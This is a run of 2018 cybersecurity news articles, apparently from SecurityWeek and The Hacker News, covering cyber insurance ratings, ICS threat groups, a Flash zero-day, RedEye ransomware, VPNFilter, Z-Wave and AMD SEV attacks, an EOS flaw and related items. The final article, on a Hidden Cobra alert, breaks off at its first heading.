AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in able to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses," The advantage for those small businesses is they will be able to realistically set premiums, but will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company, that would not of its own resources be able to provide recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015; $20 million Series B in 2016; and $27.5 million Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."

Group That Caused Power Outage Stops Focusing Exclusively on Ukraine
7.6.2018 securityweek ICS

Electrum, the Russia-linked hacker group believed to be responsible for the 2016 power outage in Ukraine, no longer focuses exclusively on this country, according to industrial cybersecurity firm Dragos.

Electrum is said to have used Crashoverride/Industroyer, a piece of malware designed to target industrial control systems (ICS), to cause the power outage in December 2016. Researchers have also found links to Sandworm (aka TeleBots and BlackEnergy), which has been blamed for the 2015 power outage that hit Ukraine. Sandworm is also believed to have played a role in the ongoing VPNFilter campaign.

According to Dragos, Electrum initially focused on development and facilitating Sandworm attacks. However, starting with the Crashoverride attack, it took on operational tasks as well.

The group is still active and starting with last year it has been seen focusing on organizations outside of Ukraine. While Dragos is unable to disclose which regions have been targeted, the company tells SecurityWeek that the hackers have launched attacks on organizations in the water and electric sectors.

The security firm has been monitoring Electrum and earlier this year it came across new information on the threat actor’s infiltration techniques and capabilities of the Crashoverride malware. Researchers say the group relies on common attack methods rather than zero-day vulnerabilities and exploits.

“For instance, the group used Microsoft SQL database servers as the gateway that bridges both the business and industrial control networks, to successfully compromise industrial control systems where they used stolen credentials to execute code,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

The company told SecurityWeek it had not identified any new deployment of the Crashoverride malware. “Crashoverride was a very specific framework for electric grid attacks. We would only expect to see this immediately prior to an ICS impact,” it said.

“The group’s ongoing activity and link to the Sandworm team indicate Electrum’s sponsor could direct ICS disruption operations to other geographic areas,” Caltagirone noted. “Dragos considers Electrum to be one of the most competent and sophisticated threat actors currently in the ICS industry.”

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Last week, it reported that a threat actor linked to North Korea’s Lazarus Group had stopped targeting organizations in the United States.

Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player,, also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-500 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.

Data Classification Firm DocAuthority Raises $10 Million
7.6.2018 securityweek IT

Israeli startup firm DocAuthority has raised $10 million in a Series A funding round led by Raine Ventures, with the participation of Greycroft, ffVC, Differential VC in the US, and 2B Angels and Plus Ventures in Israel. The finance will be used to accelerate growth and market reach.

DocAuthority brings artificial intelligence to the classification problem for unstructured data. Security and compliance require that company secrets, intellectual property and personal information be adequately secured; but business efficiency requires ready access to and use of non-confidential data. This requires accurate document classification, specifying what level of security control should be applied to different documents.

This data classification is traditionally performed manually. If applied historically it can take many months, and is subject to both false positives and false negatives in the application of classification labels. If done in real time, there is a frequent tendency for individuals to over-classify -- to assume a particular document is more sensitive than it actually is.

The result is often both an unnecessary burden on staff efficiency (through over-classification), and a failure to adequately protect instances of personal data (through under-classification). The need to locate and protect all instances of PII is increasingly important with the rapid growth of severe personal privacy legislation, such as GDPR.

DocAuthority's AI-based platform will scan documents and apply classification without human error, and at machine rather than human speed. "DocAuthority's revolutionary BusinessID technology," claims cofounder and CTO Ariel Peled, "is a new branch in data science, offering a novel take on AI that solves a major problem in data management and protection. With full automation and an accuracy level of 1:10,000, both business and security can agree and safely rely on policies for data classification, access management, DLP, encryption and as importantly, retention."

The funding "is an important milestone for DocAuthority," commented CEO Steve Abbott. "DocAuthority enables organizations to manage data based on both risk profile and business value, offering a common language across an organization. Assigning data management policies, based on business category, easily aligns security controls with business usage of data."

DocAuthority was founded in 2013 by Ariel Peled (CTO) and Itay Reved (VP R&D). It is based in Ra'anana, HaMerkaz, in central Israel.

'RedEye' Ransomware Destroys Files, Rewrites MBR
7.6.2018 securityweek

A newly discovered piece of ransomware appears mainly created to destroy the victim’s files instead of encrypting and holding them for ransom.

Dubbed RedEye, the malware appears to be the creation of the developer behind the Annabelle ransomware, who also claims to have made the JigSaw ransomware that first emerged a couple of years back (Cisco says the individual might be responsible for several other families as well).

The same as Anabelle and JigSaw, RedEye’s destructive nature makes it stand out in the crowd. While the vast majority of ransomware families out there have been created with the purpose of generating revenue for their authors and operators, RedEye would gladly destroy users’ files even if there’s no financial gain in it.

The new threat, Bart Blaze discovered, has a large file size, at 35.0 MB. This is the result of several media files (images and audio files) being embedded in the binary. Among these, there are three .wav files (child.wav, redeye.wav, and suicide.wav) meant to play a creepy sound, intended to scare the victim.

The malware author also used ConfuserEx and compression, along with a few other tricks, to protect the binary. A second binary was also embedded in the file, capable of replacing the MBR (Master Boot Record).

Once it has infected a computer, the ransomware performs a series of actions to make removal a difficult process. The threat disables task manager and also hides the victim machine’s drives.

RedEye then displays a ransom note informing victims that their files have been encrypted using AES256 and that they should access an .onion website and pay 0.1 Bitcoins to a specified address. This would supposedly result in a decryption key being delivered to them.

The victim is required to pay the ransom in 4 days, and the malware claims to be able to “fully destroy” the computer after that period of time is over.

Options available in the ransomware include the possibility to view encrypted files and decrypt them, get support, and “destroy PC.”

If the last option is selected, a GIF is displayed in the background, with an option to proceed with the operation (a "Do it" button) and another to close the image. If “Do it” is selected, the same as when the 4-day window is over, the malware reboots the machine and replaces the MBR.

Thus, when the victim powers on the system, they are greeted with a message informing them that “RedEye terminated their computer.” The malware author signed the message with the “iCoreX” handle.

Blaze also notes that, despite claiming to have securely encrypted files with AES256, RedEye appears to actually “overwrite or fill files with 0 bytes,” thus rendering them useless. The malware also appends the .RedEye extension to the affected files.

“While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware. As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill,” Blaze concludes.

FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco's released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported about a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and likely been designed by Russia-baked state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home offices (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-access storage (NAS) devices.

Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other, Talos researchers also found evidence that the VPNFilter source code share code with versions of BlackEnergy—the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.

The seizure of the domain that is part of VPNFilter's command-and-control infrastructure allows the FBI to redirect attempts by stage one of the malware (in an attempt to reinfect the device) to an FBI-controlled server, which will capture the IP address of infected devices and pass on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or having default credentials, users are strongly recommended to change default credentials for their devices to prevent against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it.
If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices.

Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download their data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature only available for people having accounts in European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR) act, which goes into effect on May 25.

However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR act was passed with an aim to completely transform the way companies handle its users' personal data, giving users more control over their data. The act applies to all companies that collect the data of EU people, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data are provided into a separate list as this data may be large and can take a long time to download.
Apple splits up the data into chunks, which ranges from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.

Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides data download feature, Apple is also providing an option of permanently deleting all of your data, which has been made available globally starting today. Once you initiate the data delete option, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.

Pornhub launches VPNhub – a free and unlimited VPN service
7.6.2018 thehackernews  Safety

PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service.
Yes, you heard that right.
Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity.

Dubbed VPNhub, the VPN service by PornHub is available for both mobile as well as desktop platform, including Android, iOS, MacOS, and Windows.
VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections.

VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes.

However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes."
Since some government, including that of United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense.

VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government.
While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account.
You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries."
You can give premium VPNhub a try by using its use 7-day free trial.

Z-Wave Downgrade Attack Left Over 100 Million IoT Devices Open to Hackers
7.6.2018 thehackernews  IoT

Researchers have found that even after having an advanced encryption scheme in place, more than 100 million Internet-of-Things (IoT) devices from thousands of vendors are vulnerable to a downgrade attack that could allow attackers to gain unauthorized access to your devices.
The issue resides in the implementation of Z-Wave protocol—a wireless, radio frequency (RF) based communications technology that is primarily being used by home automation devices to communicate with each other.
Z-Wave protocol has been designed to offer an easy process to set up pairing and remotely control appliances—such as lighting control, security systems, thermostats, windows, locks, swimming pools and garage door openers—over a distance of up to 100 meters (330 feet).

The latest security standard for Z-Wave, called S2 security framework, uses an advanced key exchange mechanism, i.e., Elliptic-Curve Diffie-Hellman (ECDH) anonymous key agreement protocol, to share unique network keys between the controller and the client device during the pairing process.
Even after Silicon Labs, the company who owns Z-Wave, made it mandatory for certified IoT devices to use the latest S2 security standard, millions of smart devices still support the older insecure version of pairing process, called S0 framework, for compatibility.
S0 standard was found vulnerable to a critical vulnerability in 2013 due to its use of a hardcoded encryption key (i.e. 0000000000000000) to protect the network key, allowing attackers in range of the targeted devices to intercept the communication.

After analyzing Z-Wave, security researchers from UK-based Pen Test Partners discovered that devices which support both versions of key-sharing mechanisms could be forced to downgrade the pairing process from S2 to S0.
Dubbed Z-Shave by the researchers, the downgrade attack makes it easier for an attacker in range during the pairing process to intercept the key exchange, and obtain the network key to command the device remotely.

Researchers found the vulnerability while comparing the process of key exchange using S0 and S2, wherein they noticed that the node info command which contains the security class is being transferred entirely unencrypted and unauthenticated, allowing attackers to intercept or broadcast spoofed node command without setting the security class.

The researchers—Ken Munro and Andrew Tierney—used the Conexis L1 Smart Door Lock, a flagship product of British company Yale that ships for $360, for their exploit, and were able to downgrade its security, and eventually steal the keys and get permanent access to the Yale lock, and therefore the building protected by it, all without the actual user's knowledge.
You can also watch the video of the Z-Shave attack, wherein the researchers demonstrated how an attacker could unlock a door.

The S0 decryption attack was initially revealed by cybersecurity consulting company SensePost back in 2013, but at that time, Silicon Labs didn't see this issue "as a serious threat in the real world" because it was limited to the timeframe of the pairing process.
Silicon Labs published a blog post in response to the Pen Test Partners' findings on Wednesday, saying the company is confident its smart devices are secure and not vulnerable to such threats.
"S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities, and mandatory for all new Z-Wave products submitted for certification after April 2, 2017," reads the blog post.
However, the company said that since the adoption of S2 framework across the ecosystem could not happen overnight, the issue existed in Z-Wave for providing backward compatibility, so that S2 devices can work in an S0 network (and vice versa).
The company also said there are procedures in place to notify and alert users in times when secure devices connect to networks using downgraded communications, but IoT device manufacturers hardly provide any user interface to show such alerts, leaving users unaware of this attack.

Researchers Defeat AMD's SEV Virtual Machine Encryption
7.6.2018 thehackernews  Safety

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD's Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.
AMD's Secure Encrypted Virtualization (SEV) technology, which comes with EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.

Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of lack in the integrity protection of the page-wise encryption of the main memory, allowing a malicious hypervisor to extract the full content of the main memory in plaintext from SEV-encrypted VMs.
Here's the outline of the SEVered attack, as briefed in the paper:
"While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.
"This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside."
"We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM's memory in plaintext."
During their tests, the team was able to extract a test server's entire 2GB memory data, which also included data from another guest VM.
In their experimental setup, the researchers used a with the Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running web services—the Apache and Nginx web servers—as well as an SSH server, OpenSSH web server in separate VMs.

As malicious HV, the researchers used the system's Kernel-based Virtual Machine (KVM) and modified it to observe when software within a guest accessed physical RAM.
While Apache and Nginx web servers the extraction of memory data was high (at a speed of 79.4 KB/sec), OpenSSH had a higher response time which reduced the extraction speed to only 41.6 KB/sec.
"Our evaluation shows that SEVered is feasible in practice and that it can be used to extract the entire memory from an SEV-protected VM within a reasonable time," the researchers said. "The results specifically show that critical aspects, such as noise during the identification and the resource stickiness are managed well by SEVered."
The researchers also recommended a few steps AMD could take to isolate the transition process between the host and Guest Physical Address (GPA) to mitigate the SEVered attack.
The best solution is to provide "a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves."
However, securely combine the hash of the page’s content with the guest-assigned GPA could be a low-cost, efficient solution, which ensures "pages cannot easily be swapped by changing the GPA to HPA mapping."
The research was carried out by four Fraunhofer AISEC researchers—Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel—which has been published in their paper [PDF] titled, "SEVered: Subverting AMD’s Virtual Machine Encryption."

Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews 

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of Vulcan team and Zhiniang Peng of Core security team—the vulnerability is a buffer out-of-bounds write issue which resides in the function used by nodes server to parse contracts.

To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in EOS network—servers that collect transaction information and pack it into blocks.
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."

Since the super node system can be controlled, the researchers said the attackers can "do whatever they want," including, controlling the virtual currency transactions, and acquiring other financial and privacy data in the EOS network participating node systems, such as an exchange Digital currency, the user's key stored in the wallet, key user profiles, privacy data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researcher can bypass multiple default security mitigation measures to achieve complete control over the super node running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 ​​security team has previously discovered and disclosed multiple relevant high risk vulnerabilities,"
The researchers believe the new type of vulnerabilities affect not only EOS alone but also other types of Blockchain platforms and virtual currency applications.

Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges for all of the four people in March last year, which resulted in the arrest of Baratov in Toronto at his Ancaster home and then his extradition to the United States.
However, Belan—who is already on the FBI's Most Wanted Hackers list—and both FSB officers currently reside in Russia, due to which they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, wherein he charged customers around $100 to obtain another person's webmail password by tricking them to enter their credentials into a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts of individuals for seven years and send those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download the Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.

Russia asks Apple to remove Telegram Messenger from the App Store
7.6.2018 thehackernews  BigBrothers

Russia's communications regulator Roskomnadzor has threatened Apple to face the consequences if the company does not remove secure messaging app Telegram from its App Store.
Back in April, the Russian government banned Telegram in the country for the company's refusal to hand over private encryption keys to Russian state security services to access messages sent using the secure service.
However, so far, the Telegram app is still available in the Russian version of Apple's App Store.
So in an effort to entirely ban Telegram, state watchdog Roskomnadzor reportedly sent a legally binding letter to Apple asking it to remove the app from its Russian App Store and block it from sending push notifications to local users who have already downloaded the app.
Roskomnadzor's director Alexander Zharov said he is giving the company one month to remove the Telegram app from its App Store before the regulator enforces punishment for violations.
For those unfamiliar with the app, Telegram offers end-to-end encryption for secure messaging, so that no one, not even Telegram, can access the messages that are sent between users.
However, despite being banned in April, the majority of users in Russia are still using the app via Virtual Private Networks (VPNs), and only 15 to 30 percent of Telegram's operations in the country have been disrupted so far, Roskomnadzor announced yesterday.
This failure leads the regulator to turn to Apple for help taking the app down.
"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company’s further actions to resolve the problematic issue," said Roskomnadzor in the letter.
The state regulator also says that the regulator is in talks with Google to ban the Telegram app from Google Play as well.
Roskomnadzor is a federal executive body in Russia which is responsible for overseeing the media, including the electronic media, mass communications, information technology and telecommunications; organizing the work of the radio-frequency service; and overseeing compliance with the law protecting the confidentiality of its users' personal data.
Roskomnadzor wanted Telegram to share its users' chats and encryption keys with the state security services, as the encrypted messaging app is widely popular among terrorists that operate inside Russia.
However, Telegram declined to comply with the requirements.
Apple has primarily expressed its support for encryption and secure data in the past, but we have seen the company complying with the local demands.
Last year, Apple removed all VPN apps from its App Store in China, making it harder for internet users to bypass its Great Firewall, and moved its iCloud operations to a local firm linked to the Chinese government.
Also, at the end of last year, Apple pulled Skype, along with several similar apps, from its App Store in China.

FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.2018 thehackernews 

The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one.
Joanap—A Remote Access Trojan
